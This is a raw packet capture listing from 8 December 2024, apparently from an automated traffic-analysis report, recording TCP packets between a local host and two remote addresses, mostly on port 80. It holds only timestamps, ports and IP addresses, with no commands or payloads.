Dec 8, 2024 13:31:54.261549950 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.262337923 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.262482882 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.262665987 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.263061047 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.263242960 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.263252974 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.263334990 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.264223099 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.264353037 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.264370918 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.264478922 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.265014887 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.265177011 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.265523911 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.265691996 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.265871048 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.266004086 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.266762018 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.266772032 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.266880035 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.266905069 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.267117023 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.267563105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.267693043 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.268310070 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.268320084 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.268327951 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.268378973 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.268378973 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.375170946 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.375323057 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.375350952 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.375463963 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.375514030 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.375632048 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.375704050 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.375817060 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.376460075 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.376619101 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.376749039 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.376879930 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.377310038 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.377386093 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.377398968 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.377650023 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.378082037 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.378125906 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.378145933 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.378201008 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.378983974 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.379091978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.379432917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.379584074 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.379800081 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.379925966 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.380002975 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.380057096 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.380628109 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.380707026 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.380729914 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.380897999 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.381493092 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.381598949 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.381620884 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.381771088 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.382421017 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.382494926 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.382666111 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.382755041 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.383239031 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.383374929 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.383641005 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.383718967 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.384044886 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.384202957 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.384761095 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.384886026 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.384903908 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.384975910 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.385324001 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.385461092 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.392762899 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.392844915 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.392857075 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.392865896 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.392916918 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.392916918 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.393024921 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.393037081 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.393048048 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.393059969 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.393085957 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.393172979 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.393209934 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.393228054 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.393239021 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.393250942 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.393266916 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.393275976 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.393286943 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.393299103 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.393311024 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.393395901 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.433290958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.433343887 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.433743000 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.433754921 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.433769941 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.433799028 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.433939934 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.434540987 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.434670925 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.434676886 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.434753895 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.435477018 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.435540915 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.435697079 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.435772896 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.435784101 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.435869932 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.436676025 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.436685085 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.436747074 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.437405109 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.437532902 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.437875986 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.437957048 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.438261032 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.438271999 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.438460112 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.439073086 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.439253092 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.439703941 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.439857006 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.439987898 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.439997911 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.440191984 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.440783024 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.440941095 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.441520929 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.441658020 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.441685915 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.441710949 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.442158937 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.442528963 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.442543030 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.442629099 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.442629099 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.443358898 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.443888903 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.444302082 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.444314003 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.444324970 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.444386959 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.444386959 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.445039034 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.445207119 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.445930958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.445941925 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.445964098 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.446032047 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.446032047 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.446737051 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.447176933 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.447199106 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.447308064 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.447606087 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.447766066 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.448477030 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.448487043 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.448534012 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.448559046 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.448888063 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.449299097 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.449527025 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.449788094 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.450095892 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.450248003 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.450371027 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.450663090 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.450778961 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.451059103 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.451069117 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.451153040 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.451891899 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.451903105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.451988935 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.452780008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.452790976 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.452941895 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.453563929 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.453835964 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.454479933 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.454489946 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.454559088 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.454586983 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.454674006 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.455261946 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.455588102 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.456181049 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.456192017 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.456202984 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.456234932 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.456346989 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.456986904 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.457842112 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.457854033 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.457890987 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.457918882 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.458686113 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.458709002 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.459577084 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.459589005 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.459595919 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.459606886 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.459630966 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.459930897 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.460383892 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.460697889 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.463875055 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.541655064 CET	443	49853	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:54.542473078 CET	49853	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:54.542473078 CET	49853	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:54.542495012 CET	443	49853	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:54.542527914 CET	443	49853	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:54.567502022 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.567586899 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.567673922 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.567918062 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.567971945 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.567996979 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.568255901 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.568768978 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.568877935 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.568900108 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.568926096 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.569632053 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.569794893 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.570004940 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.570094109 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.570492983 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.570504904 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.570565939 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.571321964 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.571470976 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.571662903 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.571746111 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.572252035 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.572263002 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.572432995 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.573046923 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.573246002 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.573318958 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.573908091 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.573997021 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.574402094 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.574614048 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.574728966 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.574994087 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.575383902 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.575592041 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.575716972 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.575738907 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.575830936 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.576410055 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.576539040 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.576725960 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.576874971 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.577258110 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.577342987 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.577903986 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.578041077 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.578145027 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.578255892 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.578692913 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.578855038 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.578986883 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.579138041 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.579168081 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.579267979 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.579943895 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.579956055 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.580004930 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.580672026 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.580770969 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.580796003 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.580992937 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.581598997 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.581727028 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.581758976 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.582381964 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.582530975 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.582731962 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.582881927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.583264112 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.583276033 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.583337069 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.614610910 CET	443	49854	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:54.615144968 CET	49854	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:54.615161896 CET	443	49854	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:54.615839958 CET	49854	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:54.615843058 CET	443	49854	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:54.625509024 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.625614882 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.625772953 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.625924110 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.625988007 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.626413107 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.626523972 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.626740932 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.626808882 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.627629995 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.627684116 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.627873898 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.627914906 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.627968073 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.628032923 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.628148079 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.628864050 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.628941059 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.629194975 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.629256964 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.629595995 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.629610062 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.629659891 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.630496979 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.630631924 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.630769014 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.630896091 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.631309032 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.631325006 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.631371021 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.631371021 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.632172108 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.632183075 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.632230997 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.632230997 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:54.632996082 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:54.633126020 CET	49835	80	192.168.2.6	185.215.113.206
